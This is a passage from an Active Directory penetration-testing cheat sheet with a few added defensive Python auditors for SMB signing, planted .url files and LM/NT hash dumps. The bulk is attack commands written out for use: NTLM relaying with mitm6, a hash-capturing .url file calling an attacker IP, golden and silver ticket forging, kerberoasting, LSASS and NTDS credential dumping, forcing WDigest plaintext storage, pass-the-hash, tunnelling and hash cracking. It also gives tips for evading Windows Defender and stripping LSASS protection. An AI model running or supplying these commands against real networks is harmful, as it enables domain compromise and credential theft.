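def parse_nmap_signing(text: str) -> Dict[str, str]:
    """Map each scanned host (IP where nmap prints one) to its signing state string."""
    result: Dict[str, str] = {}
    host = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            host = m["ip"] or m["bare"]
            continue
        m = SIGNING_RE.match(line)
        if m and host:
            result[host] = m["state"].strip()
    return result


def parse_cme_signing(text: str) -> Dict[str, bool]:
    """Map each host in crackmapexec output to whether signing is required."""
    return {m["ip"]: m["signing"] == "True" for m in map(CME_RE.match, text.splitlines()) if m}


def hosts_not_requiring_signing(nmap_text: str = "", cme_text: str = "") -> List[str]:
    """Union of hosts from both sources where signing is not enforced: the remediation list."""
    weak = {h for h, s in parse_nmap_signing(nmap_text).items() if s != "enabled and required"}
    weak |= {h for h, required in parse_cme_signing(cme_text).items() if not required}
    return sorted(weak)


if __name__ == "__main__":
    for host in hosts_not_requiring_signing(SAMPLE_NMAP, SAMPLE_CME):
        print(host)
```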
IPv6 Attack
https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
- install mitm6 → download from GitHub, cd to the directory, and pip3 install .
  - if it fails, try normal pip
- mitm6 -d [domain]
AND
- impacket-ntlmrelayx -6 -t ldaps://[DC IP] -wh bogus.[domain] -l [directory]
  - cd to the directory and firefox [file] to see the info
  - look for the username and password of the newly created user in the ntlmrelayx prompt
URL File Attack
Note: must have access to a writable SMB share
- upload a file whose name starts with @ or ~ and ends in .url: @test.url
  - (@ or ~) ensures it shows up at the top when a user opens the share
- file contents:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\[attacker ip]\%USERNAME%.icon
IconIndex=1
- responder -I [interface] -v
https://github.com/Greenwolf/ntlm_theft
ntlm_theft -s [attacker ip] -f [name] -g [all/url]
hashcat -m 5600 [hashes] [wordlist]
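A .url file is a plain INI file, so the planted file above is easy to spot on a share: its IconFile (or URL/WorkingDirectory) is a UNC path to a host that is not one of the share's own servers, and it usually embeds %USERNAME%. The following is an added example, not part of the original cheat sheet: a Python auditor that parses the [InternetShortcut] section and reports those traits. The sample file, the placeholder address 10.10.14.5 and the TRUSTED_HOSTS allowlist are constructed assumptions.

```python
import configparser
import re
from typing import Dict, List, Optional

# Constructed sample: the contents of an @-prefixed .url file of the kind described
# above, with a placeholder attacker address (not a real capture).
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\10.10.14.5\%USERNAME%.icon
IconIndex=1
"""

# Assumed allowlist: servers that may legitimately be referenced over UNC paths.
TRUSTED_HOSTS = {"fileserver01", "fileserver01.corp.local"}

# \\host\... : capture the host part of a UNC path
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] keys as a dict, or {} if the text is not a .url file."""
    parser = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    parser.optionxform = str                # keep key case (IconFile, not iconfile)
    try:
        parser.read_string(text)
    except configparser.Error:              # no section header, duplicate keys, ...
        return {}
    if not parser.has_section("InternetShortcut"):
        return {}
    return dict(parser.items("InternetShortcut"))


def unc_host(value: str) -> Optional[str]:
    """Host named by a UNC path, lower-cased, or None for non-UNC values."""
    m = UNC_RE.match(value.strip())
    return m.group(1).lower() if m else None


def audit_shortcut(text: str, filename: str) -> List[str]:
    """Findings for one .url file: sort-to-top name, untrusted UNC target, %USERNAME% leak."""
    findings: List[str] = []
    data = parse_internet_shortcut(text)
    if not data:
        return findings
    if filename[:1] in ("@", "~"):
        findings.append(f"{filename}: name starts with '{filename[0]}' (sorts to the top of the share)")
    for key in ("URL", "WorkingDirectory", "IconFile"):
        value = data.get(key, "")
        host = unc_host(value)
        if host and host not in TRUSTED_HOSTS:
            findings.append(f"{filename}: {key} points at untrusted UNC host {host}")
        if "%USERNAME%" in value.upper():
            findings.append(f"{filename}: {key} embeds %USERNAME% (leaks the opening user's name)")
    return findings


if __name__ == "__main__":
    for finding in audit_shortcut(SAMPLE_URL_FILE, "@test.url"):
        print(finding)
```

Walk each writable share and pass every *.url file through audit_shortcut; the same IconFile check applies to .scf and .lnk files, which the ntlm_theft generator above also produces, though those need their own parsers.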
BloodHound
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html
Collection
- SharpHound.exe -c [method] -d [domain] --exclude-dcs --zipfilename sharp.zip
- bloodhound-python -c [method] -d [domain] -u [username] -p [password] --hashes [hash] -ns [DC] --zip -v
- Invoke-Bloodhound (from SharpHound.ps1)
  - powershell -ep bypass
  - . .\SharpHound.ps1
  - Invoke-Bloodhound -CollectionMethod [method] -Domain [domain] -ExcludeDCs -ZipFileName [outfile]
- on first run: CollectionMethod → All
- on subsequent runs (to get updated session info): CollectionMethod → Session
  - in BloodHound, click Database Info → Clear Sessions
Analysis
- neo4j console
- bloodhound --no-sandbox
MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
Kerberos
Kerberos Authentication
AS_REP → provides the TGT → the ticket used to request other service tickets
- you can only have one TGT
TGS_REP → provides a TGS → ticket granting access to a specific service
Ticket Conversion
Converting tickets between impacket and mimikatz/Rubeus format
kirbi2ccache [kirbi file] [ccache file]
ccache2kirbi [ccache file] [kirbi file]
impacket-ticketConverter [ccache/kirbi file] [kirbi/ccache file]
- kirbi → mimikatz
- ccache → impacket
Request New Initial TGT
Note: requires the user's password or hash
Rubeus
rubeus asktgt /domain: /user: /password:
- /enctype:[rc4|aes128|aes256|3des]
  - use aes256 (default) for enctype
- if you don't have the password but have the hash, replace /password: with /rc4:, /aes128:, /aes256: or /des:
Mimikatz
tgt::ask /domain: /user: /password:
Impacket (Remote)
impacket-getTGT [domain]/[user]:[password]
- -dc-ip [DC]
- -hashes [hash]
export KRB5CCNAME=[ticket].ccache
Request Delegated TGT
can't change passwords with delegated TGTs, but can request TGSes
Notes:
- domain controllers can provide delegated TGTs by default
- normal for some processes (like explorer) but odd for others (like notepad); for processes where it's odd, use /host if you don't want to get flagged by Windows Defender
- useful for using impacket scripts without knowing the password → convert the ticket to ccache
Rubeus
rubeus tgtdeleg
- /target:[SPN]
Mimikatz
tgt::deleg → contacts the domain controller by default
- /host:[FQDN] → have another host delegate for you (stealthier)
  - find one with Get-AdComputer -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
Request TGS
Rubeus
rubeus asktgs /service:[SPN]/[FQDN]
- to impersonate another user (same as requesting a TGT):
  - /enctype:
  - /user:[username]
  - /password:[password]
  - if you don't have the password but have the hash, replace /password: with /rc4:, /aes128:, /aes256: or /des:
Mimikatz
kerberos::ask /target:[SPN]/[FQDN]
- optional /export to export the ticket
Impacket (Remote)
impacket-getST [domain]/[user]:[password] -spn [service]/[host]
- -dc-ip [DC]
- -hashes [hash]
- -impersonate [user]
Note: Automatically modifies impersonate TGS so it can be used with other impacket tools.
Modify Existing TGS for Another Service
Rubeus
rubeus asktgs /altservice:[SPN] /ticket:[ticket]
β /ptt will automatically load onto current logon session
Impacket (Remote)
See note above. Realistically, this is only used in constrained delegation attacks so look there.
Harvest Tickets
Rubeus
rubeus harvest /interval:30 → list the current session's TGT
- interval: time between harvests (seconds)
rubeus triage → list all tickets in the current session with logon id and expiration time
rubeus klist → list current session tickets with detailed info
rubeus dump → extract all tickets (basically /export for mimikatz)
- /user:[user] for a specific user
- /service:[service] for a specific service
- /luid:[logon id] for a specific session, if we have access to all sessions (admin)
- /nowrap → easier copy-and-paste
Mimikatz
kerberos::tgt → list current session TGT
kerberos::list → list all tickets in the current session
sekurlsa::tickets → list all tickets for all sessions, but injects into LSASS memory, so don't do it if there's a monitoring service
- add /export to any of these to export; run base64 /out:true and base64 /in:true first to export base64-encoded tickets (less likely to be detected)
Harvest Keys
Mimikatz
sekurlsa::ekeys
Purge Tickets
Rubeus
rubeus purge
Mimikatz
kerberos::purge
Pass-the-Key (PTK)/Overpass-the-Hash (OPTH)
pass-the-key or pass-the-hash to obtain a TGT
Rubeus
rubeus asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt
Mimikatz
sekurlsa::pth /user:[user] /domain:[domain] /rc4:[hash]
- /run:[cmd.exe OR powershell.exe]
Impacket (Remote)
impacket-getTGT [domain]/[user]:[password]
- -dc-ip [DC]
- -hashes [hash]
export KRB5CCNAME=[ticket].ccache
Pass-the-Ticket (PTT)
Note: can either pass the TGT or pass the TGS
- dump the ticket to be passed (see Harvest Tickets above)
  - for Mimikatz, export tickets with sekurlsa::tickets /export
Rubeus
rubeus ptt /ticket:[ticket]
Mimikatz
kerberos::ptt [ticket]
- verify with klist → list cached tickets
Impacket
export KRB5CCNAME=[ticket].ccache
Golden/Silver Ticket
Golden Ticket: create a forged TGT for a domain admin using the krbtgt account's hash
Silver Ticket: create a forged TGS for a service using the service account's hash → useful for impersonating users when logging into a service
- same effect as requesting a TGT or TGS, but without communicating with the domain controller
- you can create it for any user, even one that doesn't exist
Mimikatz
Domain SID:
wmic useraccount get name,sid
Current Realm:
kerberos::golden /user: /domain: /sid: /krbtgt: /ptt
- sid → DC SID
- krbtgt → [NTLM hash]
- user and id can be whatever you want them to be
  - /user:Administrator /id:500 for a golden ticket
- service → specify the SPN for a silver ticket
Inter-Realm:
kerberos::golden /user: /domain: /sid: /krbtgt: /service:krbtgt /sids: /ptt
- sid → child DC SID
- krbtgt → [NTLM hash]
- sids → Enterprise Admins group SID
- user and id can be whatever you want them to be
  - /user:Administrator /id:500 for a golden ticket
Impacket
Domain SID:
impacket-getPac -targetUser Administrator [domain]/[user]:[password]
crackmapexec ldap [DC] -u [user] -p [password] -k --get-sid
Current Realm:
impacket-ticketer -domain [domain] -domain-sid [SID] -nthash [krbtgt hash] Administrator
- for another user: replace Administrator with -user-id [ID] [user]
- -spn [SPN] for a silver ticket
export KRB5CCNAME=[ticket].ccache
Inter-Realm:
Manually
impacket-ticketer -domain [domain] -domain-sid [SID] -nthash [krbtgt hash] -spn krbtgt -extra-sid [enterprise admin group SID]
export KRB5CCNAME=[ticket].ccache
Automatically
impacket-raiseChild [domain]/[user]:[password]
- -w [ticket] → write out the golden ticket
- -target-exec [host] → psexec to the host after compromise
Skeleton Key
used to access any SMB share with the same password
- misc::skeleton
  - default password is mimikatz
- see Interacting with SMB above
AS-REP Roasting
Obtaining Hash
Rubeus
rubeus asreproast /format:[hashcat/john] /outfile:hashes.txt
Impacket
impacket-GetNPUsers [domain]/[user]:[password]
- -dc-ip [DC]
- -hashes [hash]
- without creds (don't provide [user]:[password]) → -usersfile [usernames]
- -request -format [hashcat/john] -outputfile hashes.txt
Cracking
hashcat -m 18200 hashes.txt [wordlist]
john hashes.txt --wordlist [wordlist]
Kerberoasting (TGS-REP Roasting)
Note: requires access to any user account on the domain
Obtaining Hash
Rubeus
rubeus kerberoast /outfile:hashes.txt
Impacket
impacket-GetUserSPNs [domain]/[user]:[password]
- -dc-ip [DC]
- -hashes [hash]
- -request-user [SPN]
- -request -outputfile hashes.txt
Cracking
hashcat -m 13100 hashes.txt [wordlist]
john hashes.txt --wordlist [wordlist]
Constrained Delegation
Check for Constrained Delegation
Get-Net[User/Computer] -TrustedToAuth | Select name,msds-allowedtodelegateto,useraccountcontrol
Get-Net[User/Computer] [name] | Select-Object -ExpandProperty msds-allowedtodelegateto
impacket-findDelegation [domain]/[user]:[password]
Exploit Constrained Delegation
impacket-getST -spn [service]/[host] -impersonate [user to impersonate] [domain]/[user]:[password]
export KRB5CCNAME=[ticket].ccache
You can also use Rubeus:
1. request a TGT for the service
2. request a TGS on behalf of the user (Rubeus s4u)
3. modify the existing TGS for another service (like cifs)
4. load the TGS
However, this is probably a waste of your time since impacket does this in one command.
WDigest Plaintext Logon Credentials
- reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 → force WDigest to store logon credentials in plaintext
- wait for a user to log in
- sekurlsa::wdigest → check for plaintext passwords
Group Policy Preferences (GPP)
Note: patched in MS14-025
Locally
1. C:\Windows\SYSVOL\Preferences\Groups\Groups.xml on the domain controller
2. copy the cpassword value from the cpassword attribute
3. gpp-decrypt [cpassword]
Impacket
impacket-Get-GPPPassword [domain]/[user]:[password]@[DC]
- -xmlfile [Groups.xml file] local → parse a local XML file
Pivoting
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
Dumping Hashes
Linux
- cat /etc/passwd → users
- cat /etc/shadow → password hashes
- unshadow /etc/passwd /etc/shadow > hashes.txt → combine for hash cracking
Windows
https://www.thehacker.recipes/ad/movement/credentials/dumping
Hashes are stored in three places:
- SAM # local user accounts
- LSA # domain user accounts
- NTDS.dit # everyone on the domain (DC only)
Locally
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
Task Manager > right-click lsass.exe > Create dump file
procdump -accepteula -ma lsass.exe lsass.dmp
Control Panel > User Accounts > Credential Manager
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
Mimikatz
- token::elevate
- privilege::debug
- lsadump::sam /patch # SAM hashes
- lsadump::lsa /patch OR lsadump::lsa /inject # LSA hashes
- sekurlsa::msv # hashes in LSASS memory
- sekurlsa::logonpasswords # hashes for users logged in since last reboot
  - if this returns an error, run the following and try again:
    !+
    !processprotect /process:lsass.exe /remove
- sekurlsa::credman # hashes in Windows Credential Manager
- lsadump::dcsync /domain:[domain] /all /csv # NTDS.dit
  - equivalent of -just-dc in impacket-secretsdump
Impacket
- impacket-secretsdump [domain]/[user]:[password]@[host]
OR
- impacket-secretsdump [domain]/[user]@[host] -hashes [hash]
Flags:
- -just-dc # only NTDS.dit data (NTLM hashes and Kerberos keys)
- -just-dc-ntlm # only NTDS.dit data (NTLM hashes only)
- -sam [SAM file] -system [SYSTEM file] -security [SECURITY file] local # dump directly from saved SAM hive
- -ntds [NTDS file] -system [SYSTEM file] -security [SECURITY file] local # dump directly from saved NTDS.dit
- -no-pass # don't prompt for password (used with -k)
- -k # use the Kerberos ticket in the ccache pointed to by KRB5CCNAME (-k takes no argument)
CrackMapExec
crackmapexec smb [host] -u [username] -p [password] [--sam/--lsa/--ntds]
Pass-the-Hash (PTH)
https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/
Note: Hash is in the form [LM hash]:[NT hash] unless otherwise stated. LM hash can also be either empty or 32 zeros in most cases.
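A small parser for the hash form this note describes, added here and not part of the original notes: it normalises LM:NT strings (empty LM or 32 zeros both mean "no LM hash") and audits secretsdump-style lines for accounts that still store an LM hash or have an empty password. The sample lines are constructed; only the two well-known empty-LM and empty-NT constants are real values.

```python
"""Parse and audit credential lines in the [LM hash]:[NT hash] form.
Added example, not part of the original notes. SAMPLE_DUMP is constructed;
its hex values are placeholders apart from the two empty-hash constants."""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed secretsdump-style records: user:rid:lm:nt:::
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "legacy:1001:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::",
    "svc:1002:00000000000000000000000000000000:ABCDEF0123456789ABCDEF0123456789:::",
]

def split_hash(value):
    """Accept 'LM:NT' or a bare 'NT'; return (lm, nt) lowercased, with an absent
    or all-zero LM half normalised to EMPTY_LM. Raise ValueError on bad input."""
    parts = value.strip().split(":")
    if len(parts) == 1:
        lm, nt = "", parts[0]
    elif len(parts) == 2:
        lm, nt = parts
    else:
        raise ValueError("expected LM:NT or NT")
    if lm in ("", "0" * 32):
        lm = EMPTY_LM
    if not (HEX32.match(lm) and HEX32.match(nt)):
        raise ValueError("hashes must be 32 hex characters")
    return lm.lower(), nt.lower()

def audit_dump(lines):
    """Report accounts whose LM hash is populated (LM storage still enabled)
    or whose NT hash is that of an empty password."""
    report = {}
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) < 4:
            continue  # not a user:rid:lm:nt::: record
        lm, nt = split_hash(fields[2] + ":" + fields[3])
        issues = []
        if lm != EMPTY_LM:
            issues.append("lm-hash-stored")
        if nt == EMPTY_NT:
            issues.append("empty-password")
        if issues:
            report[fields[0]] = issues
    return report
```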
Mimikatz
- token::revert
- sekurlsa::pth /user:[user] /domain:[domain] /ntlm:[NT hash] /run:"[command]"
CrackMapExec
- crackmapexec [protocol] [host] -d [domain] -u [user] -H [NT hash] -x [command]
  - can use --local-auth instead of -d
  - -t [threads]
  - --verbose
crackmapexec [protocol] -h for more info
Protocols:
- FTP
- RDP
- MSSQL
- SMB
- LDAP
- SSH
- WinRM
Impacket
Note: If you have a Kerberos ticket, you can omit -hashes and use -k -no-pass instead. See Request New Initial TGT or Request Delegated TGT above.
- be sure to modify the relevant sections of /etc/krb5.conf: domain_realm and realms
impacket-smbclient [domain]/[user]:[password]@[host]
impacket-smbexec [domain]/[user]:[password]@[host]
impacket-psexec [domain]/[user]:[password]@[host]
impacket-atexec [domain]/[user]:[password]@[host]
impacket-wmiexec [domain]/[user]:[password]@[host]
impacket-dcomexec [domain]/[user]:[password]@[host]
impacket-mssqlclient [domain]/[user]:[password]@[host]
impacket-GetADUsers
impacket-getArch
impacket-lookupsid
impacket-machine_role
impacket-netview
impacket-rdp_check
impacket-mqtt_check
impacket-mimikatz
impacket-reg
impacket-services
impacket-rpcdump
impacket-samrdump
impacket-addcomputer
Metasploit Modules
- exploit/windows/smb/psexec
  - "Use custom templates or MOF upload method to circumvent AV detection"
- auxiliary/admin/smb/psexec_command
- exploit/windows/local/current_user_psexec
Port Redirection/Tunnelling
SSH
A device has access to a port I want.
ssh [device I'm connecting to that has what I want: user@ip] -p [port to ssh to that device on, usually 22] -L [what port of mine I want it on]:[what I want: ip:port]
I have access to a port a device wants.
ssh [device I'm connecting to that wants what I have: user@ip] -p [port to ssh to that device on, usually 22] -R [what port of theirs they want it on]:[what they want: ip:port]
ProxyChains
SSH
From target (SSH server on attacker): ssh -fN -R [port] root@[attacker]
From attacker (SSH server on target): ssh -fN -D [port] [user]@[target]
Chisel
On attacker: chisel server -p 8000 --socks5 --reverse
On target: chisel client [attacker]:8000 R:socks
edit /etc/proxychains.conf
...
socks5 [host] 1080
proxychains [command to execute on target]
Ligolo-ng
Prep (on attacker):
ip tuntap add user [user] mode tun ligolo
ip link set ligolo up
ip route add [network] dev ligolo
On attacker (proxy): ligolo -selfcert -laddr 0.0.0.0:8000
On target (agent): ligolo -connect [attacker]:8000 -ignore-cert
session
start
listener_add --addr 0.0.0.0:[target port] --to 127.0.0.1:[kali port] --tcp
Hash Cracking
Wordlist Generation
Crunch
crunch [minimum num characters] [maximum num characters] [characters] -t [pattern] -b [max filesize] -o [filename]
- -p # no repeating characters
- -p [word1] [word2] ... # mix words, no repeats
- pattern:
  - @ # lowercase letters
  - , # uppercase letters
  - % # numbers
  - ^ # special characters
crunch [minimum num characters] [maximum num characters] -f /usr/share/crunch/charset.lst [charset] -t [pattern] -b [max filesize] -o [filename]
- search charsets using cat /usr/share/crunch/charset.lst
man crunch for more info
- example: crunch 6 6 0123456789ABCDEF -o crunch1.txt
Cewl
cewl [base URL] -m [min word length] -d [crawl depth] -w [output file] --with-numbers
Identification
hash-identifier
HashCat
hashcat -m [type] [hashes] [wordlist]
hashcat -m [type] -a 3 [hashes] [mask (optional)]
- ?l # lowercase letters
- ?u # uppercase letters
- ?d # digits
- ?s # special characters
- ?a # all of the above
- ?b # all bytes 0x00-0xff (null, etc.)
Windows NTLM: -m 1000
Rules
https://hashcat.net/wiki/doku.php?id=rule_based_attack
/usr/share/hashcat/rules
hashcat -r [file].rule --stdout [wordlist]
hashcat -r [file].rule ...
John
unshadow /etc/passwd /etc/shadow > [hashlist]
john [hashes] --format=[type] --wordlist=[wordlist]
rm /etc/john/john.pot
Rules
/etc/john/john.conf has all rules
- add a section with [List.Rules:rulename] followed by hashcat-style rules
john --rules=[rulename]